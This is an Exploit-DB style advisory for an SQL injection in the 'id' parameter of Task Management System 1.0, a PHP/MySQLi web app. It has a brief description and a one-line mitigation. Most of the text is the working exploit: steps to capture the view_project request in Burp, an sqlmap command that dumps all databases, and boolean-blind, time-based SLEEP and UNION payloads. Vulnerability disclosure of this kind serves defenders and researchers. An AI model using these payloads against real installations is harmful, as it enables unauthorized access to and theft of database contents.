Task Management System 1.0 - 'id' SQL Injection

vendor:

Task Management System

by:

Saeed Bala Ahmed (r0b0tG4nG)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Task Management System

Affected Version From: Version 1

Affected Version To: Version 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Parrot OS

2020

Task Management System 1.0 – ‘id’ SQL Injection

Task Management System 1.0 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries to view the contents of the database. This can be done by capturing the request of the 'page=view_project&id=' page in Burp Suite and running SQLMap on the request file.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Task Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-08
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1. Log into application with credentials
Step 2. Click on Projects
Step 3. Select View Projects
Step 4. Choose any project, click on action and select view
Step 5. Capture the request of the "page=view_project&id=" page in burpsute
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs "
Step 7. This will inject successfully and you will have an information disclosure of all databases contents

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=view_project&id=3 AND 5169=5169

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_project&id=3 AND (SELECT 3991 FROM (SELECT(SLEEP(5)))NOXH)

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: page=view_project&id=-2597 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627a71,0x5a46784156705a6e654b6a454d44767155796a466f41436c6667585763424b534a4f4c4e52775a45,0x7176767071),NULL,NULL,NULL,NULL,NULL,NULL-- -
---